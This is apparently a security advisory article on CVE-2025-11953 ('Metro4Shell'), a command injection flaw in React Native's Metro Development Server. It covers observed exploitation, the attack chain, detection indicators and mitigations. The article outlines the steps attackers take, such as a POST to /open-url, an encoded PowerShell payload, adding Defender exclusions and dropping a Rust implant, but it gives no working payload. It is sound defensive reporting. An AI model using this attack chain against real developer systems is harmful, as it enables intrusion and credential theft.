Security researchers at VulnCheck have confirmed active exploitation of CVE-2025-11953, a critical command injection vulnerability in React Native’s Metro Development Server. Dubbed Metro4Shell, the flaw allows unauthenticated remote code execution and has been exploited since December 2025 to deploy Rust-based malware on developer systems.
Vulnerability overview
| Attribute | Details |
|---|
| CVE | CVE-2025-11953 |
| Name | Metro4Shell |
| CVSS score | 9.8 (Critical) |
| Affected package | @react-native-community/cli |
| Weekly downloads | ~2 million |
| Affected versions | 4.8.0 - 20.0.0-alpha.2 |
| Fixed version | 20.0.0 |
| Discovery | VulnCheck |
Timeline
| Date | Event |
|---|
| Early November 2025 | CVE-2025-11953 disclosed |
| December 21, 2025 | VulnCheck observes first exploitation |
| January 4, 2026 | Additional exploitation observed |
| January 21, 2026 | Continued exploitation confirmed |
| February 4, 2026 | VulnCheck publishes exploitation details |
Technical details
Root cause
The Metro Development Server, used during React Native development, contains a command injection flaw in the /open-url endpoint.
| Component | Issue |
|---|
| Endpoint | /open-url |
| Parameter | url |
| Flaw | Insufficient input validation |
| Impact | Arbitrary command execution |
Exploitation mechanism
| Platform | Capability |
|---|
| Windows | Execute arbitrary programs + shell commands with controlled arguments |
| Linux/macOS | Execute arbitrary programs |
The Metro server binds to external interfaces by default, allowing unauthenticated attackers to send malicious POST requests.
Attack request example
| Element | Description |
|---|
| Method | POST |
| Endpoint | /open-url |
| Parameter | url containing malicious payload |
| Result | Command execution on developer machine |
Exploitation in the wild
VulnCheck observations
| Date | Activity |
|---|
| December 21, 2025 | First recorded exploitation on VulnCheck Canary network |
| January 4, 2026 | Same payloads delivered |
| January 21, 2026 | Continued operational use |
VulnCheck characterized the activity:
“The delivered payloads were consistent across multiple weeks of exploitation, indicating operational use rather than vulnerability probing or proof-of-concept testing.”
Attack sophistication
| Indicator | Assessment |
|---|
| Payload consistency | Operational, not experimental |
| Multi-week duration | Sustained campaign |
| Cross-platform targeting | Windows and Linux payloads |
| Malware sophistication | Custom Rust-based implant |
Attack chain
Stage 1: Initial exploitation
| Step | Action |
|---|
| 1 | Scan for exposed Metro Development Servers |
| 2 | Send POST request to /open-url endpoint |
| 3 | Trigger command execution via malicious URL parameter |
Stage 2: Payload delivery (Windows)
| Step | Action |
|---|
| 1 | cmd.exe executes with base64-encoded PowerShell payload |
| 2 | PowerShell adds Windows Defender exclusions |
| 3 | Exclusions cover current directory and %TEMP% |
| 4 | Second-stage payload downloaded |
| 5 | Rust-based malware executed |
Stage 3: Malware deployment
| Attribute | Details |
|---|
| Language | Rust |
| Anti-analysis | Basic evasion logic |
| Persistence | Under investigation |
| Targets | Windows and Linux systems |
The awareness gap
Despite active exploitation since December 2025, the vulnerability has received limited attention:
| Metric | Status |
|---|
| EPSS probability | 0.00405 (low) |
| Public acknowledgment | Limited |
| Security community awareness | Low |
| Time since first exploitation | 6+ weeks |
VulnCheck noted:
“This gap between observed exploitation and wider recognition matters, particularly for vulnerabilities that are easy to exploit and exposed on the public internet.”
Why developers are targets
High-value access
| Asset | Value to attackers |
|---|
| Source code | Intellectual property theft |
| Credentials | API keys, tokens, secrets |
| CI/CD access | Supply chain compromise |
| Corporate network | Lateral movement |
| Signing keys | Malicious package distribution |
Development environment risks
| Risk factor | Impact |
|---|
| Elevated privileges | Developers often have admin access |
| Network exposure | Dev servers accessible from network |
| Security tooling gaps | EDR may exclude dev tools |
| Trust assumptions | Internal tools assumed safe |
Detection
Network indicators
| Indicator | Detection method |
|---|
| POST requests to Metro server | Web server logs |
/open-url endpoint access | Request logging |
| Unusual outbound connections | Network monitoring |
| PowerShell execution | Process monitoring |
Host indicators
| Indicator | Detection method |
|---|
| Defender exclusion additions | Windows Security logs |
| Rust binary execution | Process monitoring |
| cmd.exe with base64 arguments | Command-line logging |
| Unusual %TEMP% activity | File system monitoring |
| Priority | Action |
|---|
| Critical | Update @react-native-community/cli to 20.0.0+ |
| Critical | Ensure Metro servers not internet-exposed |
| High | Review logs for exploitation indicators |
| High | Scan for compromise if exposed during window |
Configuration hardening
| Control | Implementation |
|---|
| Network binding | Configure Metro to bind localhost only |
| Firewall rules | Block external access to development ports |
| Network segmentation | Isolate dev environments |
| VPN requirement | Require VPN for remote development |
Verification
| Check | Command/Location |
|---|
| Package version | npm list @react-native-community/cli |
| Metro binding | Check metro.config.js for host settings |
| Network exposure | `netstat -an |
Recommendations
For development teams
| Priority | Action |
|---|
| Critical | Upgrade React Native CLI immediately |
| High | Audit network exposure of dev tools |
| High | Implement network segmentation |
| Medium | Enable enhanced logging for dev environments |
| Ongoing | Monitor for suspicious development tool activity |
For security teams
| Priority | Action |
|---|
| Critical | Inventory React Native development environments |
| High | Threat hunt for Metro4Shell exploitation |
| High | Add detection rules for attack indicators |
| Medium | Review developer machine security policies |
| Ongoing | Include dev tools in vulnerability management |
For organizations
| Priority | Action |
|---|
| High | Establish dev environment security standards |
| High | Include dev tools in asset inventory |
| Medium | Security training for developers |
| Ongoing | Regular assessment of development security |
Context
Metro4Shell highlights the increasing targeting of developer environments and tools by threat actors. Developers represent high-value targets due to their access to source code, credentials, CI/CD pipelines, and signing keys.
The vulnerability’s characteristics make it particularly dangerous:
- High severity (CVSS 9.8)
- Easy to exploit (single POST request)
- Wide exposure (2 million weekly downloads)
- Low awareness (limited public acknowledgment)
- Active exploitation (operational attacks observed)
The gap between exploitation start (December 2025) and broader security community awareness demonstrates that traditional vulnerability prioritization metrics (like EPSS) may not reflect actual risk for developer-focused vulnerabilities.
Organizations should treat development environments as critical infrastructure and apply the same security rigor used for production systems. The days of assuming internal development tools are safe from external attack are over.
